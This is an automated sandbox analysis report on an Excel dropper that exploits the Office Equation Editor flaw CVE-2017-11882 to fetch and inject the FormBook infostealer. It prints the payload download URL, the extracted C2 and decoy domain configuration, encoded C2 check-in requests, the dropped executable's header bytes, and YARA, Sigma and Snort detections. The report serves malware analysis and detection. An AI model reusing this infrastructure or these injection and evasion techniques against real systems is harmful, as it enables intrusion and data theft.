Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Letter 1019.xlsx

Overview

General Information

Sample Name:Letter 1019.xlsx
Analysis ID:432595
MD5:e781a9517fe291b2c42878ac9c68d70c
SHA1:01e1b2d2df156dfe65bca40f264c71bcee9fa592
SHA256:2d4f498ee8c41344e6bab8d1d638d48a62672c5cb6ee67afdd5e3333d892715e
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2792 cmdline: 'C:\Users\Public\vbc.exe' MD5: 15D907E7D9F8286E5053796C9D78FCEC)
      • vbc.exe (PID: 2440 cmdline: C:\Users\Public\vbc.exe MD5: 15D907E7D9F8286E5053796C9D78FCEC)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 1688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x5685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x5171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x5787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x58ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x43ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.35eb4f8.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.35eb4f8.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x10aa68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x10adf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x131c88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x132012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x116b05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13dd25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x1165f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13d811:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x116c07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13de27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x116d7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x13df9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10b80a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x132a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11586c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x13ca8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x10c582:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1337a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x11bbf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x142e17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x11cc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 18.140.1.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2792
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2792

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://18.140.1.169/ggs/doc.exeAvira URL Cloud: Label: malware
          Source: http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeReversingLabs: Detection: 15%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 15%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Letter 1019.xlsxReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: vbc.exe
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_009BD8C0
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_009BDA40
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00416282
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_2_00406A94
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi7_2_00096282
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx7_2_00086A95
          Source: global trafficDNS query: name: www.myfavbutik.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.140.1.169:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 18.140.1.169:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 18.140.1.169:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 172.67.161.4:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:24:50 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 10 Jun 2021 09:42:41 GMTETag: "f2a00-5c4663658bc88"Accept-Ranges: bytesContent-Length: 993792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5b dd c1 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0f 00 00 0a 00 00 00 00 00 00 1a 3d 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 3c 0f 00 4f 00 00 00 00 40 0f 00 80 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 90 3b 0f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 1d 0f 00 00 20 00 00 00 1e 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 06 00 00 00 40 0f 00 00 08 00 00 00 20 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 28 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 3c 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 54 01 00 a4 03 01 00 03 00 00 00 05 00 00 06 70 58 02 00 20 e3 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 21 00 00 0a 28 22 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 23 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 02 16 28 28 00 00 0a 00 2a 4e 00 02 28 0d 00 00 06 6f b9 02 00 06 28 29 00 00 0a 00 2a 26 00 02 28 2a 00 00 0a 00 2a ce 73 2b 00 00 0a 80 01 00 00 04 73 2c 00 00 0a 80 02 00 00 04 73 2d 00 00 0a 80 03 00 00 04 73 2e 00 00 0a 80 04 00 00 04 73 2f 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 33 00 00 0a 0a
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.myfavbutik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 99.83.154.118 99.83.154.118
          Source: Joe Sandbox ViewIP Address: 99.83.154.118 99.83.154.118
          Source: Joe Sandbox ViewASN Name: SAKURA-BSAKURAInternetIncJP SAKURA-BSAKURAInternetIncJP
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /ggs/doc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.140.1.169Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
